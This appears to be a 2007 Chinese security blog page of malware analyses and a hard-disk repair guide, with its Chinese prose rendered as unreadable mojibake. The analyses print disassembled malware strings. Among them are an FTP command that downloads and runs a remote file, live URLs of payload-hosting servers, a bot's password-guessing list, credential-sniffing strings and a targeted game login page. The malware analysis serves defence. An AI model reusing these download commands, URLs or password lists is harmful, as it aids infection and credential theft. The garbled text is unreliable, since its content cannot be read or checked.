��ȥ¥��

[��]red pig

renlangliu — 2007-05-31 18:00

��ͼ��˵��

���� 鿴��

[ԭ��]dmecvcm.exe��iywdqdf.exe��kocmbcd.exe��autorun.infרɱ��

renlangliu — 2007-05-30 22:11

�ǻῴ�˺��£��Ǻǣ��дרɱ�ˣ��ģ�ż�ű��ô��һ�㣬Ҳд��һ��ó��棬��ֻ��XP��ϵͳƽ̨��һ�¹��ص�ַ��

http://rxuancai.136.tofor.com/showdown.asp?soft_id=25

ģ�飻

1��taskkill��ifeo��̻��أ�ɾ��ļ��

2��з��ɾ��ļ��Լ�autorun�ű�

3��ifeo�Ͳ��ע��

4��ָ��õķ��

��ҵķ��ַ��http://hi.baidu.com/ycosxhack/blog/item/c75fe7cafef4c647f21fe78a.html

���� 鿴��

[ת��]��ݻָ�Ӳ�̿��ȫ�� (ͼ)

renlangliu — 2007-05-29 15:23

ԭ�ĵ�ַδ֪��ð��

��,Ӳ�̵��Խ��Խ��,��ǵĹ��˼��ķ��.��,Ӳ�̵Ĵ��ʹ��һ��.��û�м�ʱ��,��Ǵ��޷��ʧ.�Һ�,Ŀǰ�ڹ��ڳ��ֵ�һ��ҵ"��ݻָ�",ʹ��ݶ�ʧ,��ƻ�,��ɾ��,��ghost,Ӳ��...�Ȳ��Һ��Լ��Ҫ��,�Ӷ��ʧ.
��ܵ��Ǵ��Ϊ��,��Ϊ��,Ҳ��ټ��Ӳ�̿��̸��ͷ��.��Ҫ�˽�һ�´�ͷ��Ƭ�Ĺ�ϵ,��Ҷ�֪��,��Դż�¼��ʽ�洢��Ƭ�ϵ�,��ȡ��д�붼��ͷ��.Ȼ��,��ͷ��Ƭ�϶�ȡ��,��ڴ��̵ĸ��ת,ʹ�ô�ͷ��á��³�˹��/Winchester��Ƭ��.��ʹ��Ӳ�̴�ͷ��ʹ��м��ǲ�ĥ��,��ʹ��ݴ洢�ǳ��ȶ�,Ӳ��Ҳ��.��ͷҲ�Ƿǳ��,��Ӳ�̹��״̬��,��ʹ��С��,��п��ʹ��ͷ�ܵ��.��Ƭ�ǹ��޳��,��,��ڴ��ͷ��,Ҳ��Ǹ��ͷʱ,��޳��,��һ�Ҫ��ʵ�Ļ��,��ļ��,��ʹ�ɹ��ʴ��Ϻ��ݻָ�.
��Ǿ��߿�ͼƬ.��˽��ͷ�ľ��

��,��Ҫ�ض��͹��,�޳��Ǳز��ٵ�,��ǿ��Դ�ͼ�п��Ҫҽ��,��,��ǯ,ֱͷ��ͷ��,��˿��(һ�ֺ�t8)

��Ҫ��ͷ��Ӳ��ĳ�ͻ��һ��120g Ӳ��,��ǹ��,��ת,��ͷ��.��,��С�ĵؽҿ�Ӳ��ϵı��ޱ�ǩ.

��Ȼ�ǲ��top�ϵ��˿,Ϊ�˹��Ч��,��治��Ҫ��ܸߵ��˿,��ǿ��õ綯��ȥж.

��С�ĵĽ��˿��,��top,��ǾͿ��һ��ŵؿ��Ӳ�̵��ڲ��ṹ��,��ǿ��ؿ��Ӳ�̵ĸ��,��base,��moter,��disc,��ͷeblk,��Ѿ��򿪵Ķ��top......

��ǻ�Ժ�,��Ҫ��ͷeblk��pcba��.��,��ǾͲ�ѡ�õ綯��,��ֹ��,��Դ��ؽ��ʧ��ɵ��غ��,��Ƭ��Ҫ�ر𱣻��,��κ��.

��vcm��е��ϴ��,�ϴ��Ƿǳ��,��Ҫ�ǳ��,��ס��ǻ,��ֽ��ռ��ǯ,��ϴ��ȡ��.

Ȼ��Ҫ�Ѵ�ͷ��Ƭ��ͣ��Ƴ��,�Ƴ��Ƭ,��ſ��Խ��ͷ��.

��һ��˿��С�ĵز��´�ͷ,��ְ�ס��ͷ,��ͷ��κζ��.

С��vcm,�ѻ��ͷȡ��.

��ͼ��ǿ��Ŀ��,��120g��3��ͷ,��(��),��һ��.��Ƭ��Ŀ��2Ƭ.

ȡ�´�ͷ�Ժ�,��ҳ��ͻ��ͷͬһ�ͺŵĴ�ͷȥ��,��׼��,��ı��ô�ͷ.

С�ĵؽ��װ��ǻ��,��Ǵ�ͷ��κζ��,��Ϊ��ͷ�Ƿǳ��,��Ļ�Ƭ��΢�ܵ��ͻ��,һ��ͷ��,��ͷ�ı��.

��ǹؼ��еĹؼ��,��ʦ�Ļ��;��鶼��,��ʧ��,��»��ϵĴ�ͷ,��Ǵ�ͷ��Ƭ,��ʦ��ӽ��ͷ��,ֱ��3��ͷȫ��ŵ��Ƭ��,��Ȼ,��ͷ��ĿԽ��Ҳ��ζ��Ѷ�Խ��.

�Ѵ�ͷ�Ƶ��Ƭ�ϵĴ�ͷͣ��

�Ѵ�ͷ��pcba��߹̶��

��װvcm��......

ok,��Ѿ��װ��ǻ��ж��.��ϸ��һ�¾Ϳ��Թ��top��

��һ��.��װtop,��˿��ȻҪע��˳��,��Ҫһ��Ͻ�,�ȶԽ��˿,Ȼ��ڶԽ��š��ÿ��˿......

�Ǻ�,һ�е�Ŭ��ڻ��˳ɹ�,��pc��һ��,˳��ö��һ��,Ӳ��Ѿ��,��Ƭû��Ļ��ֱ�ӹҸ��ֱ�Ӹ��,��Ƭ��,��Ǿ��Ҫ��ָ��.......

��,ͼƬ��Ϻ��ݻָ��raid�ָ��ṩ

��Ӳ��ά�� 鿴��

[ת��]PE�ļ��ṹʾ��ͼ

renlangliu — 2007-05-29 10:55

ͼƬת��ڿ�ѩѧԺ��

��ϵͳӦ�� 鿴��

[ԭ��]��Բ��棺winfx32.exe/winnt.bat

renlangliu — 2007-05-28 22:52

��ԣ�http://bbs.kafan.cn/viewthread.php?tid=90302&extra=page%3D2&page=1

��ƣ�winfx32.exe��PS��ͽ�����ɣ�

��С��448,512 �ֽ�

�ӿǷ�ʽ��δ֪

��Ԥ��4��

��ָ�ƣ�

SHA-160                     : 697E2D59FA689ECEBFE7CB94AD0E56279B7735CD
MD5                         : 90ADC603C68C2330D229C73E403025A5
RIPEMD-160                  : 95CE00210ACB1878C3DA6764BB4EFAFC1F9ED36D
CRC-32                      : CB349415

��ߣ���[G-AVR]�µ�ÿһ��

��µ�ַ��http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html

��գ�

http://scanner.virus.org

ArcaVir	1.0.4	Clean	2.67871 secs
avast!	3.0.0	Clean	0.00514603 secs
AVG Anti Virus	7.5.47	Clean	2.70932 secs
BitDefender	7.1	Backdoor.VB.EV	4.52359 secs
CAT QuickHeal	9.00	Clean	4.53888 secs
ClamAV	0.90/3311	Clean	0.531867 secs
Dr. Web	4.33.0	Clean	8.43897 secs
F-PROT	4.6.7	Clean	0.732941 secs
F-Secure	1.02	Backdoor.Win32.Rbot.cmy [AVP]	0.069514 secs
H+BEDV AntiVir	2.1.10-41	Clean	5.56607 secs
McAfee Virusscan	5.10.0	New Malware.bx	1.97413 secs
NOD32	2.51.1	Clean	2.93163 secs
Norman Virus Control	5.70.01	Clean	7.61458 secs
Panda	9.00.00	Clean	1.39275 secs
Sophos Sweep	4.17.0	Clean	5.45505 secs
Trend Micro	8.310-1002	Clean	0.020252 secs
VBA32	3.12.0	Clean	3.28923 secs
VirusBuster	1.3.3	Clean	2.03353 secs

http://www.virustotal.com

Antivirus	Version	Update	Result
AhnLab-V3	2007.5.29.0	05.28.2007	no virus found
AntiVir	7.4.0.27	05.28.2007	no virus found
Authentium	4.93.8	05.23.2007	no virus found
Avast	4.7.997.0	05.28.2007	no virus found
AVG	7.5.0.467	05.28.2007	no virus found
BitDefender	7.2	05.28.2007	Backdoor.VB.EV
CAT-QuickHeal	9.00	05.28.2007	no virus found
ClamAV	devel-20070416	05.28.2007	no virus found
DrWeb	4.33	05.28.2007	no virus found
eSafe	7.0.15.0	05.28.2007	Win32.Rbot.cmy
eTrust-Vet	30.7.3670	05.28.2007	no virus found
Ewido	4.0	05.28.2007	no virus found
FileAdvisor	1	05.28.2007	no virus found
Fortinet	2.85.0.0	05.28.2007	suspicious
F-Prot	4.3.2.48	05.25.2007	no virus found
F-Secure	6.70.13030.0	05.28.2007	no virus found
Ikarus	T3.1.1.8	05.28.2007	Backdoor.VB.EV
Kaspersky	4.0.2.24	05.28.2007	Backdoor.Win32.Rbot.cmy
McAfee	5040	05.28.2007	New Malware.bx
Microsoft	1.2503	05.28.2007	no virus found
NOD32v2	2293	05.27.2007	no virus found
Norman	5.80.02	05.28.2007	no virus found
Panda	9.0.0.4	05.28.2007	no virus found

��Ի��winXPSP2 ʵ��

��к󿽱��%systemroot%\system32\Ŀ¼�£��ע��ʵ��ͼ��̡�

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

��ƣ�Windows Service Agent

��ͣ�REG_SZ��winfx32.exe

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

��ӣ�hxxp://alzahaby.com/vip/vrx6.exe��

��Ķ˿�ɨ��ɨ��˿ڣ�

ʹ��net send���Ͷ��Ϣ

����DDOS��

ʹ��FTP��ļ�

___:00433EA8 s_VncD_DSS-Auth db 'VNC%d.%d %s: %s - [AuthBypass]',0
___:00433EA8                                                          ; DATA XREF: ___:0040EDF6 o
___:00433EC7                                  align 4
___:00433EC8 s_Rfb03d_03d                     db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: ___:0040EC83 o
___:00433ED7                                  align 4
___:00433ED8 word_433ED8                      dw 1                                     ; DATA XREF: ___:0040EBFA r
___:00433ED8                                                          ; sub_41B4FC+24 r
___:00433ED8                                                          ; ___:0041B656 r
___:00433EDA                                  align 4
___:00433EDC ; char s_Cmd_exe[]
___:00433EDC s_Cmd_exe                        db 'cmd.exe',0                           ; DATA XREF: ___:0040F01D o
___:00433EDC                                                          ; sub_41A153+21 o
___:00433EE4 s_EchoOpenSD>>O db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o &echo bye >>o &ftp -n -s'
___:00433EE4                                                          ; DATA XREF: ___:0040F317 o
___:00433EE4                                  db ':o &del /F /Q o &%s',0Dh,0Ah,0
___:00433F54 s_221GoodbyeHap db '221 Goodbye happy r00ting.',0Ah,0
___:00433F54                                                          ; DATA XREF: ___:0040F952 o
___:00433F70 s_425CanTOpenDa db '425 Can',27h,'t open data connection.',0Ah,0
PS��֪��Ϊʲô��VNC��ѵ�VNC�ֳ��©��

ʹ��̽ץ��ԭ��ȡ�û��

___:00436EA8 s_IrcSniff                       db 'IRC sniff',0                         ; DATA XREF: sub_412FC2+5 o
___:00436EB2                                  align 4
___:00436EB4 s_Pass_0                         db 'PASS ',0                             ; DATA XREF: sub_413038+73 o
___:00436EBA                                  align 4
___:00436EBC s_User_2                         db 'USER ',0                             ; DATA XREF: sub_413038+62 o
___:00436EC2                                  align 4
___:00436ED4 s_FtpSniff                       db 'FTP sniff',0                         ; DATA XREF: sub_413038+5 o
___:00436F14 s_HttpSniff                      db 'HTTP sniff',0                        ; DATA XREF: sub_4130BF+5 o

___:00436F50 s_VulnSniff db 'VULN sniff',0 ; DATA XREF: sub_413146+5 o

��½��̣�

�޸�host�ļ��δʵ�֣�

��Զ�NT4.0/2000SP1-SP4/XPSP0SP��TFTP��

��û��ƽ�

___:00429898 s_Oracle                         db 'oracle',0
___:0042989F                                  align 10h
___:004298A0 s_Dba                            db 'dba',0
___:004298A4 s_Database                       db 'database',0
___:004298AD                                  align 10h
___:004298B0 s_Default                        db 'default',0
___:004298B8 s_Guest_0                        db 'guest',0
___:004298BE                                  align 10h
___:004298C0 s_Wwwadmin                       db 'wwwadmin',0
___:004298C9                                  align 4
___:004298CC s_Teacher                        db 'teacher',0
___:004298D4 s_Student                        db 'student',0
___:004298DC s_Owner                          db 'owner',0
___:004298E2                                  align 4
___:004298E4 s_Computer                       db 'computer',0
___:004298ED                                  align 10h
___:004298F0 s_Root                           db 'root',0
___:004298F5                                  align 4
___:004298F8 s_Staff                          db 'staff',0
___:004298FE                                  align 10h
___:00429900 s_Admin                          db 'admin',0
___:00429906                                  align 4
___:00429908 s_Admins                         db 'admins',0
___:0042990F                                  align 10h
___:00429910 s_Administrat                    db 'administrat',0
___:0042991C s_Administrateu db 'administrateur',0
___:0042992B                                  align 4
___:0042992C s_Administrador db 'administrador',0
___:0042993A                                  align 4
___:0042993C s_Administrat_0 db 'administrator',0
��Ϊa-z��õ��ʣ�ϵͳ��ơ��֡��

��ڶ�©��

��к��ټ��ټ��ü��ܻ��󣬲��ڿ��߳̽��150��ͼ��

PS��ָò��Ŀǰ��㣬ɱ��У�д��һ��רɱ��򣬶Բ��ߣ��ӭ��ʹ�á�

��ص�ַ��http://rxuancai.136.tofor.com/showdown.asp?soft_id=24

���� 鿴��

[ԭ��]��棺ws2ifsl.sys/avp.exe/tf6sound.dll

renlangliu — 2007-05-28 16:22

��ƣ�1.exe

��С��284,190 �ֽ�

�ӿǷ�ʽ����

��д��ԣ�Borland��Delphi

��Ԥ��2��

��ָ�ƣ�
SHA-160                 : CB929DBB1929477A851DB06A54D1EA96FA1DFB10
MD5                     : 59419C7C3B504A07FF92A7F40826A28F
RIPEMD-160              : 4E7BEA5F1D676C8C03974EE0FC6685D240F14AE7
CRC-32                  : 731FC41F

����[G-AVR]�µ�ÿһ��

��µ�ַ��http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html

��գ�
http://scanner.virus.org

ArcaVir	1.0.4	Clean	3.67603 secs
avast!	3.0.0	Clean	0.0464969 secs
AVG Anti Virus	7.5.47	Clean	3.26215 secs
BitDefender	7.1	GenPack:Generic.PWStealer.874D09AB	5.07662 secs
CAT QuickHeal	9.00	Clean	5.16741 secs
ClamAV	0.90/3311	Clean	0.407175 secs
Dr. Web	4.33.0	Trojan.PWS.Maran	9.5218 secs
F-PROT	4.6.7	Unknown	0.776782 secs
F-Secure	1.02	Trojan-PSW.Win32.Maran.dy [AVP]	0.0956321 secs
H+BEDV AntiVir	2.1.10-41	NULL	5.89765 secs
McAfee Virusscan	5.10.0	PWS-Maran.dll	3.69338 secs
NOD32	2.51.1	a variant of Win32/PSW.Maran trojan	2.58767 secs
Norman Virus Control	5.70.01	Clean	8.68103 secs
Panda	9.00.00	Clean	0.968208 secs
Sophos Sweep	4.17.0	Mal/Maran-A	5.94194 secs
Trend Micro	8.310-1002	Clean	0.515448 secs
VBA32	3.12.0	Clean	3.77676 secs
VirusBuster	1.3.3	Clean	2.12044 secs

http://www.virustotal.com

AhnLab-V3	2007.5.24.0	05.28.2007	no virus found
AntiVir	7.4.0.27	05.28.2007	TR/PSW.Stealer.284190
Authentium	4.93.8	05.23.2007	could be a corrupted executable file
Avast	4.7.997.0	05.27.2007	Win32:Qhost-AI
AVG	7.5.0.467	05.27.2007	no virus found
BitDefender	7.2	05.28.2007	GenPack:Generic.PWStealer.874D09AB
CAT-QuickHeal	9.00	05.26.2007	no virus found
ClamAV	devel-20070416	05.28.2007	no virus found
DrWeb	4.33	05.28.2007	Trojan.PWS.Maran
eSafe	7.0.15.0	05.27.2007	no virus found
eTrust-Vet	30.7.3670	05.28.2007	no virus found
Ewido	4.0	05.27.2007	no virus found
FileAdvisor	1	05.28.2007	no virus found
Fortinet	2.85.0.0	05.28.2007	suspicious
F-Prot	4.3.2.48	05.25.2007	W32/Rootkit-Backdoor-based!Maximus
F-Secure	6.70.13030.0	05.28.2007	Trojan-PSW.Win32.Maran.dy
Ikarus	T3.1.1.8	05.28.2007	Generic.PWS.Maran
Kaspersky	4.0.2.24	05.28.2007	Trojan-PSW.Win32.Maran.dy
McAfee	5039	05.25.2007	PWS-Maran.dll
Microsoft	1.2503	05.28.2007	no virus found
NOD32v2	2293	05.27.2007	a variant of Win32/PSW.Maran
Norman	5.80.02	05.25.2007	no virus found
Panda	9.0.0.4	05.28.2007	no virus found
Prevx1	V2	05.28.2007	no virus found
Sophos	4.18.0	05.25.2007	Mal/Maran-A
Sunbelt	2.2.907.0	05.26.2007	VIPRE.Suspicious
Symantec	10	05.28.2007	no virus found
TheHacker	6.1.6.123	05.25.2007	no virus found
VBA32	3.12.0	05.26.2007	no virus found
VirusBuster	4.3.23:9	05.27.2007	no virus found
Webwasher-Gateway	6.0.1	05.28.2007	Trojan.PSW.Stealer.284190

��Ի��winXPProSP2 ʵ��

��Ϊ��أ��к��ͷ�ws2ifsl.sys��%systemroot%\system32\drivers\Ŀ¼�£�ע��ͷ�avp.exe��%systemroot%\Ŀ¼�£�ע��ͷ�tf6sound.dll��%systemroot%\system32\Ŀ¼��Ю��winsock��tcp/ip��raw/ip��ͷŵ��ļ�ɾ��ļ��

��޸ĺ��½�ע��

Ю��Winsock��
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2

\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001\PackedCatalogItem
C:\WINNT\system32\tf6sound.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2

\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\PackedCatalogItem
C:\WINNT\system32\tf6sound.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2

\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013\PackedCatalogItem
C:\WINNT\system32\tf6sound.dll
��Ĭ��ĸĶ��о�
��tf6sound.dll��
�²ⲡ��Ю��winsock�ں�̨ʹ�ö��IP��ַˢ��˶��Ϸ��Ǻ��˽⣬��ˢ��վ�Ǻ��Ϸ�㿨��صģ��о�һ�±�ˢ��IP��
��ҳ��https://tw.gash.gamania.com/GASHLogin.aspx

CODE:00421AD4 s_Changegashpas db 'ChangeGashPass:gash**:',0 ; DATA XREF: sub_41FD20+F14 o

CODE:00421BFC s_Changegamepas db 'ChangeGamePass:gamea**ount:',0��

PS��ַ��Լ��㿨�ǲ��µģ��û��ݲ��г��ϣ��ߺ��Ϊ֮��

61.220.62.*��
61.220.56.*-61.220.56.*
203.69.46.*-203.69.46.*
220.130.113.*
220.130.125.13*
220.130.125.14*-220.130.125.14*
220.130.125.18*-220.130.125.18*
220.130.125.24*-220.130.125.24*
220.130.125.21*-220.130.125.21*
220.130.125.17*-220.130.125.17*

ע��
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VGADown\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_VGADOWN\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_VGADOWN\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VGADown\
��ƣ�VGADown
��ʾ��ƣ�Audio Adapter
��ӳ��%systemdrive%\%systemroot%\avp.exe
��ʽ��Զ�
��
��ڣ�LocalSystem
ע��
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WS2IFSL\
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WS2IFSL\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WS2IFSL\
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WS2IFSL\
��ƣ�WS2IFSL
��ʾ��ƣ�Windows �׽�� 2 .0 Non-IFS ��ṩ��֧�ֻ��
��ӳ��%systemdrive%\%systemroot%\system32\drivers\ws2ifsl.sys
��ʽ��Զ�
��
��ڣ�LocalSystem
�б�Ҫ˵��һ�²��ļ��ws2ifsl.sys��avp.exe��avp.exe�ǲ��Ľ��ļ��win32��𣬿��п��ws2ifsl.sys��ϵͳ��Ȼ��ʽΪ��ϵͳ��Ҳ�޷��̡�

��
��IceSword�ҵ�ws2ifsl.sysavp.exeǿ��ж��ɾ��ע��ͷ��ע������ʹ��SREng��޸��ȫģʽ��ڰ�ȫģʽ��ɾ��N/A��winsock��ʹ��syscheak��winsock�޸��޸�winsockЭ�飨SREng�޷��޸��ɾ��ɾ��tf6sound.dll��ɱ��ϡ�

PS��Ҫ��ͼ��ģʽ��ǿ��ɾ��ͷ�ע��tf6sound.dll��ɷ��ġ�

���� 鿴��

[ԭ��]��text.exe(�Ѹ��)

renlangliu — 2007-05-27 01:04

��ԣ�http://bbs.kafan.cn/viewthread.php?tid=89554&extra=page%3D1

д��ǰ�棺�µ�ÿһ��ڶ��Ѵ��ٽӴ�һЩ��Ķ��ɫ��ͷ��һ�ѵ�

��ǳ��

��ļ��CHM�ĵ��ʹ��ڲ�java�ű�Ƕ��ķ��ֲ�˲��text.exe��

��ĵ��ʱ��ͻ�ִ�в��򡣲��ͷ�·��Ϊ��

C:\WINDOWS\Downloaded Program Files\test.exe��û�л��жϣ�

��ֹ��ķ�ʽ�ǵü��ǰ��ϣ��з�չ��ȻС˵��ǿɾ��ˣ��ȻҲ��޸��ķ��˵��ȥ��к��׵ģ�ʹ��UEֱ��Ĩ��Ϳ��ԣ��ؼ��text.exe�滻Ϊ????????��֮�󱣴档

�Ա�һ�£�

֮��ļ��򿪺�Ͳ��ж��ˣ��Ϊ��Ŀ¼��ˣ��㲡��Ҳ��У��ص�ͼƬ��

���� 鿴��

[ԭ��]��qrypz.exeǳ��

renlangliu — 2007-05-25 14:34

��ԣ�http://bbs.kafan.cn/viewthread.php?tid=89016&extra=page%3D1

.rdata:121520DC s_Urldownloadto db 'URLDownloadToFileA',0 ; DATA XREF: .text:12151488 o

.rdata:12152118 s_ProgramFilesI db 'program files\Internet Explorer\IEXPLORE.EXE',0

.rdata:12152284 s_File1_5D15_zi db 'file/1.5/d15.zip',0 ; DATA XREF: start+153 o
.rdata:12152295                      align 4
.rdata:12152298 s_Docprop1_dll       db '\DocProp1.dll',0         ; DATA XREF: start+123 o
.rdata:121522A6                      align 4
.rdata:121522A8 ; char s_File1_5M15_zi[]
.rdata:121522A8 s_File1_5M15_zi db 'file/1.5/m15.zip',0 ; DATA XREF: start+103 o
.rdata:121522B9                      align 4
.rdata:121522BC ; char s_Http3w_39100_[]
.rdata:121522BC s_Http3w_39100_ db 'http://3w.39100.net/',0 ; DATA XREF: start+F1 o

//��URLDownloadToFileA��IE��̨��С��´��ľ��Ϊ��֤ʵ��

http://3w.39100.net/file/1.5/d15.zip

http://3w.39100.net/file/1.5/m15.zip

.rdata:12152210 s_SoftwareMic_0 db 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\msv1_1\',0

.rdata:121521E8 s_Dllname db 'DllName',0 ; DATA XREF: start+3C0 o
.rdata:121521F0 s_Msv1_1_dll_0 db 'msv1_1.dll',0 ; DATA XREF: start+395 o

//дע��ҽ�winlogon.exe��

d15.zipǳ��

��ص�ľ��ʵ��ΪPE�ļ��Ӧ��Ǹò��Ŀռ��޷��ϴ�PE�ļ��²��Ļ��ʹ��߸��չ��ͼ��

��d15.zip'��к�ͬ�ϣ�

.rdata:35155114 s_ProgramFilesI db 'program files\Internet Explorer\IEXPLORE.EXE',0
.rdata:35155114                                             ; DATA XREF: sub_35151DA5+62 o
.rdata:35155114                                             ; sub_35152D5C+83 o
.rdata:35155141                     align 4
.rdata:35155144 ; char s_Urldownloadto[]
.rdata:35155144 s_Urldownloadto db 'URLDownloadToFileA',0 ; DATA XREF: sub_35151E2F+32 o
.rdata:351552D0 s_Login_asp?cpu db 'login.asp?cpuid=',0 ; DATA XREF: sub_35152F0C+10E o
.rdata:351552E1                     align 4
.rdata:351552E4 ; char s_Http3w_39100_[]
.rdata:351552E4 s_Http3w_39100_ db 'http://3w.39100.net/',0 ; DATA XREF: sub_35152F0C+FD o

//��http://3w.39100.net/login.asp?

.rdata:351553E8 s_File1_5D15_zi db 'file/1.5/d15.zip',0 ; DATA XREF: DllEntryPoint+139 o
.rdata:351553F9                     align 4
.rdata:351553FC ; char s_Docprop1_dll[]
.rdata:351553FC s_Docprop1_dll      db '\DocProp1.dll',0        ; DATA XREF: DllEntryPoint+115 o
.rdata:3515540A                     align 4
.rdata:3515540C ; char s_File1_5Fb15_z[]
.rdata:3515540C s_File1_5Fb15_z db 'file/1.5/fb15.zip',0 ; DATA XREF: DllEntryPoint+F7 o
.rdata:3515541E                     align 10h
.rdata:35155420 ; char s_File1_5Server[]
.rdata:35155420 s_File1_5Server db 'file/1.5/serverhelp.zip',0
.rdata:35155420                                             ; DATA XREF: DllEntryPoint+9E o
.rdata:35155420                                             ; DllEntryPoint+A9 o

//��أ��ļ��£��֤ʵ��

http://3w.39100.net/file/1.5/serverhelp.zip

http://3w.39100.net/file/1.5/fb15.zip

.rdata:35155244 ; char s_ShellAutoComm[]
.rdata:35155244 s_ShellAutoComm db 'shell\Auto\command',0 ; DATA XREF: sub_351529E9+1CB o
.rdata:35155257                     align 4
.rdata:35155258 ; char s_Shellexecute[]
.rdata:35155258 s_Shellexecute      db 'shellexecute',0         ; DATA XREF: sub_351529E9+1B5 o
.rdata:35155265                     align 4
.rdata:35155268 ; char s_Autorun[]
.rdata:35155268 s_Autorun           db 'AutoRun',0              ; DATA XREF: sub_351529E9+19F o
.rdata:35155270 ; char s_Open[]
.rdata:35155270 s_Open              db 'OPEN',0                 ; DATA XREF: sub_351529E9+19A o
.rdata:35155275                     align 4
.rdata:35155278 ; char String[]
.rdata:35155278 String              db '1.5',0                  ; DATA XREF: sub_351529E9+147 o
.rdata:35155278                                             ; sub_351529E9+1DA o
.rdata:35155278                                             ; sub_35152F0C+5A o
.rdata:35155278                                             ; sub_351535CB+49 o
.rdata:35155278                                             ; sub_35153A30+4A o
.rdata:3515527C ; char s_Ver[]
.rdata:3515527C s_Ver               db 'ver',0                  ; DATA XREF: sub_351529E9+12F o
.rdata:3515527C                                             ; sub_351529E9+1DF o
.rdata:3515527C                                             ; sub_351535CB+4E o
.rdata:3515527C                                             ; sub_35153A30+39 o
.rdata:35155280 ; char s_Autorun_inf[]
.rdata:35155280 s_Autorun_inf       db 'autorun.inf',0          ; DATA XREF: sub_351529E9+100 o
.rdata:35155280                                             ; sub_35152C2D+B0 o
.rdata:3515528C ; char s_Recycler_0[]
.rdata:3515528C s_Recycler_0        db 'RECYCLER\',0            ; DATA XREF: sub_351529E9+BC o
.rdata:3515528C                                             ; sub_35152C2D+6C o
.rdata:35155296                     align 4
.rdata:35155298 ; char s_Recycler[]
.rdata:35155298 s_Recycler          db 'RECYCLER',0             ; DATA XREF: sub_351529E9+33 o
.rdata:351552A1                     align 4

//�ò��Ϊautorun��д��վĿ¼��

serverhelp.zipǳ��

serverhelp.zip��һ��VC++д��dll��αװΪzip�ļ��ֻ��½ű��

.rdata:09167538                    unicode 0, ,0
.rdata:0916754C s_Afterbegin:                              ; DATA XREF: sub_9153920+CF o
.rdata:0916754C                    unicode 0, ,0
.rdata:09167562                    align 8
.rdata:09167568 ; char s_[]
.rdata:09167568 s_ db '

',0
.rdata:09167568 ; DATA XREF: sub_9153AE0+158 o

�Խű��Ǻ��˽⣬ֻ�ܹ��

���� 鿴��

FP30SVR.exe/mshtmlsed.exe/player.dll/inject.DLL/ser.exe/play.dll/

renlangliu — 2007-05-25 12:31

д��ǰ�棺��һ��ʮ��å��򣬱��ķ��Ǻ�͸��ö�ط��Ǻ��⣬��ָ�̡�

.rdata:00414210 s_SoftwareMic_0 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
.rdata:00414210                                          ; DATA XREF: .data:00418184 o
.rdata:00414246                  align 4
.rdata:00414248 s_SystemCurrent db 'SYSTEM\CurrentControlSet\Services\EventLog\Application\',0
.rdata:00414248                                          ; DATA XREF: .data:off_418180 o
.data:00418180 off_418180       dd offset s_SystemCurrent ; DATA XREF: .text:004016DE r
.data:00418180                                          ; "SYSTEM\\CurrentControlSet\\Services\\Event"...
.data:00418184                  dd offset s_SoftwareMic_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
.data:00418188                  dd offset off_414950
.data:0041818C                  align 10h
.data:00418190 s__?avcntservic db '.?AVCNTService@@',0

//дע��ʵ�ֵ�½ǰ��

.rdata:00414514 s_Bho_dll        db 'bho.dll',0           ; DATA XREF: .text:004123E2 o
.rdata:0041451C s_Play_dll       db 'play.dll',0          ; DATA XREF: .text:00412402 o
.rdata:00414528 s_Ser_exe        db 'ser.exe',0           ; DATA XREF: .text:00412422 o
.rdata:00414530 s_Inject_dll     db 'inject.DLL',0        ; DATA XREF: .text:00412442 o
.rdata:0041453C s_Tmp333_tmp     db 'tmp333.tmp',0        ; DATA XREF: .text:00412462 o
.rdata:00414548 s_Tmp334_tmp     db 'tmp334.tmp',0        ; DATA XREF: .text:00412482 o
.rdata:00414554 s_Tmp335_tmp     db 'tmp335.tmp',0        ; DATA XREF: .text:004124A2 o
.rdata:00414560 s_Helpie_dll     db 'HelpIE.dll',0        ; DATA XREF: .text:004124C2 o
.rdata:0041456C s_Player_dll     db 'player.dll',0        ; DATA XREF: .text:004124E2 o
.rdata:00414578 s_Mshtmlsed_exe db 'mshtmlsed.exe',0     ; DATA XREF: .text:00412502 o
.rdata:00414588 s_Fp30ie_dll     db 'FP30IE.dll',0        ; DATA XREF: .text:00412522 o
.rdata:00414594 s_Fp30py_dll     db 'FP30PY.dll',0        ; DATA XREF: .text:00412542 o
.rdata:004145A0 s_Fp30svr_exe    db 'FP30SVR.exe',0       ; DATA XREF: .text:00412562 o

//�ͷŲ��ļ�FP30SVR.exe��FP30PY.dll��FP30IE.dll��mshtmlsed.exe��player.dll��HelpIE.dll��tmp335.tmp��tmp334.tmp��tmp333.tmp��inject.DLL��ser.exe��play.dll��bho.dll

.text:00412392                  align 10h
.text:004123A0                  push     7
.text:004123A2                  push     offset s_Ms_2fax ; "ms_2fax"
.text:004123A7                  mov      ecx, offset unk_4181BC
.text:004123AC                  call     sub_4029A0
.text:004123AC
.text:004123B1                  push     offset loc_412FA0
.text:004123B6                  call     _atexit
.text:004123B6
.text:004123BB                  pop      ecx
.text:004123BC                  retn
.text:004123BC
.text:004123BC ; ---------------------------------------------------------------------------
.text:004123BD                  align 10h
.text:004123C0                  push     0Bh
